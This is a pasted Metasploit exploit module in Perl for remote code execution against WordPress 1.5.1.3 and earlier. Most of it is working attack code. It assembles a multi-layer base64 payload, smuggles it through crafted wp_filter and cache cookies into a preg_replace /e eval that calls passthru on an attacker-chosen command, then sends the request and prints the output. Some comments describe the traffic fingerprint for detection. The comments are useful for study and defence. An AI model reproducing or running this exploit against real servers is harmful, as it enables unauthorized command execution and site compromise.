HackMe

Remote Code Execution eXploit -WordPress

Jun 3rd, 2015
  1. ##
  2. # Title: Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit)
  3. # Name: php_wordpress.pm
  4. # - This is an exploit module for the Metasploit Framework, please see
  5. # http://metasploit.com/projects/Framework for more information.
  6. #
  7. ##
  8.  
  9. package Msf::Exploit::php_wordpress;
  10. use base "Msf::Exploit";
  11. use strict;
  12. use Pex::Text;
  13. use bytes;
  14.  
  15. my $advanced = { };
  16.  
  17. my $info = {
  18. 'Name' => 'Wordpress <= 1.5.1.3 Remote Code Execution eXploit',
  19. 'Version' => '$Revision: 1.0 $',
  20. 'Authors' => [ 'str0ke' ],
  21. 'Arch' => [ ],
  22. 'OS' => [ ],
  23. 'Priv' => 0,
  24. 'UserOpts' =>
  25. {
  26. 'RHOST' => [1, 'ADDR', 'The target address'],
  27. 'RPORT' => [1, 'PORT', 'The target port', 80],
  28. 'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
  29. 'RPATH' => [1, 'DATA', 'Path WordPress root directory', '/'],
  30. 'SSL' => [0, 'BOOL', 'Use SSL'],
  31. },
  32.  
  33. 'Description' => Pex::Text::Freeform(qq{
  34. This module exploits a code execution exploit in wordpress blog <= 1.5.1.3.
  35. }),
  36.  
  37. 'Refs' =>
  38. [
  39. ['MIL', '1142'],
  40. ],
  41.  
  42. 'Payload' =>
  43. {
  44. 'Space' => 512,
  45. 'Keys' => ['cmd', 'cmd_bash'],
  46. },
  47.  
  48. 'Keys' => ['wordpress'],
  49. };
  50.  
  51. sub new {
  52. my $class = shift;
  53. my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  54. return($self);
  55. }
  56.  
# Exploit: builds one HTTP GET whose Cookie header carries the attack data for
# WordPress up to 1.5.1.3 (the version bound named in the module title; later
# releases are outside its scope), sends it, and prints the raw response.
#
# Wire signature, as visible in the code below (useful for detection rules):
#   * HTTP/1.0 GET for RPATH with a fixed MSIE 6.0 / .NET CLR 1.1.4322
#     User-Agent and "Pragma: no-cache";
#   * a Cookie header made of wp_filter[query_vars][...][function] /
#     [accepted_args] pairs naming PHP functions, plus
#     cache_lastpostmodified[server]=//e and a base64 blob in
#     cache_lastpostdate[server].
# To my knowledge no legitimate WordPress client sends cookies with these
# names, so the Cookie header is a high-confidence detection anchor.
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
# Host header falls back to the raw target address when no VHOST is set.
my $vhost = $self->GetVar('VHOST') || $target_host;
my $path = $self->GetVar('RPATH');
# The command to execute comes from the framework-selected payload
# ('cmd' / 'cmd_bash' keys in $info).
my $cmd = $self->GetVar('EncodedPayload')->RawPayload;

# Layer 1: PHP snippet passthru("<cmd>"), base64-encoded; any newlines the
# encoder inserts are removed so the value survives as a single token.
my $encoded = Pex::Text::Base64Encode("passthru(\"$cmd\");");
$encoded =~ s/\n//gm;

# Express each byte of the base64 text as a PHP chr(N) term joined by '.',
# so the outer payload contains no quote characters.
# (Assigning to $_ inside map is harmless here because unpack yields
# temporaries, but it is the style perlcritic flags.)
my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $encoded));

# Append a trailing space (chr(32)) to the reconstructed string.
$byte.=".chr(32)";

# Layer 2: a query string whose args[0] is eval(base64_decode(<layer 1>)).die(),
# itself base64-encoded (newlines stripped again).
my $str = Pex::Text::Base64Encode('args[0]=eval(base64_decode('.$byte.')).die()&args[1]=x');

$str =~ s/\n//gm;

# Cookie body. The wp_filter[query_vars] entries name a chain of PHP functions
# (get_lastpostdate, base64_decode, parse_str, get_lastpostmodified,
# preg_replace) and the cache_lastpost*[server] keys seed the values those
# functions receive. '//e' looks like a PCRE pattern with the 'e' (eval)
# modifier for the preg_replace hook -- inferred from the hook list; the
# server-side mechanism that turns Cookie values into these globals is not
# shown here.
my $data = "wp_filter[query_vars][0][0][function]=get_lastpostdate;wp_filter[query_vars][0][0][accepted_args]=0;".
"wp_filter[query_vars][0][1][function]=base64_decode;wp_filter[query_vars][0][1][accepted_args]=1;".
"cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=$str".
";wp_filter[query_vars][1][0][function]=parse_str;wp_filter[query_vars][1][0][accepted_args]=1;".
"wp_filter[query_vars][2][0][function]=get_lastpostmodified;wp_filter[query_vars][2][0][accepted_args]=0;".
"wp_filter[query_vars][3][0][function]=preg_replace;wp_filter[query_vars][3][0][accepted_args]=3;";

# The request. Header values are constants, so the traffic has a stable
# fingerprint beyond the Cookie content itself.
my $req =
"GET $path HTTP/1.0\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\r\n".
"Host: $vhost:$target_port\r\n".
"Pragma: no-cache\r\n".
"Accept: */*\r\n".
"Cookie: $data\r\n".
"\r\n";

# CPORT is not declared in this module's UserOpts; presumably a framework-wide
# option for the local source port -- confirm against Msf::Exploit.
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),

);

if ($s->IsError){
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}

$self->PrintLine("[*] Sending the malicious WordPress Get request...");

$s->Send($req);

# Recv(-1, 20): presumably "read until the peer closes, 20-second timeout";
# the exact semantics belong to Msf::Socket::Tcp and are not visible here.
my $results = $s->Recv(-1, 20);
$s->Close();
# The raw HTTP response (headers plus any command output) is echoed verbatim.
$self->PrintLine($results);

return;
}
  115.  
# A module file must end by evaluating to a true value.
1;